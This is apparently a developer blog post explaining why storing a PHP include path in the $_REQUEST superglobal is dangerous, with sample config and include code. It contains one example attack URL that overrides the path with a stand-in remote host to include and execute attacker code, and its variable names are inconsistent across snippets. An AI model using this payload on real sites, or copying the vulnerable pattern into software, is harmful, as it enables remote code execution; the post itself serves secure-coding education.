During our work process we are stumbling upon different web developers’ whims. The last thing that surprised me a lot, was the use of $_REQUEST superglobal array in PHP for storing global variables. This is not a good idea, and I'll try to explain to you why.

Sooner or later, every PHP developer has to decide where to store global variables for his application. Usually the developers choose to put all global application configuration variables in a separate file. The common practices are:

• Define ordinary variables and change their scope later in the functions using the keyword ‘global’
• Define PHP constants, because they have a global scope

In our particular case, the developer decided to use another approach for storing the absolute path to the application. He used superglobal array $_REQUEST for that purpose. The situation looks like that:

config.inc.php

<?php
...
$_REQUEST[‘lang_abspath’] = ‘/var/www/examp_site/eng.inc.php’;
...
?>

other.php

<?php
...
include($_REQUEST[‘lang_abs_path’]);
...
?>

So far, so good ... but let's think about the values stored in $_REQUEST array. According to the language specification this is associative array consisting of the contents of $_GET, $_POST, and $_COOKIE.

OK, let’s go deeper. In the default setting (EGPCS) $_REQUEST is first populated with the data of $_ENV, and then with $_GET. If there are keys with the same name, then the values from $_GET will overwrite these from $_ENV, and then the $_REQUEST is populated with values from $_POST, $_COOKIE and $_SERVER and the same will happen for all keys with same names.

So … now we put some imagination here and consider the situation when someone requests other.php in the following way:
other.php?app_abspath=http://hack.mack.com/evel_one.php

In this case the initial value of the $_REQUEST[‘app_abspath’] variable will be overwritten by the value sent in query string and the remote file will be included and executed …
Overwriting the values in global arrays is a topic with big importance when you have to rewrite an old PHP applications that works with register_globals=on, to applications that works with register_globals=off, especially if you plan to use import_request_variables() for quick fixes.

More on the import_request_variables() topic here:
http://www.wisec.it/vulns.php?id=10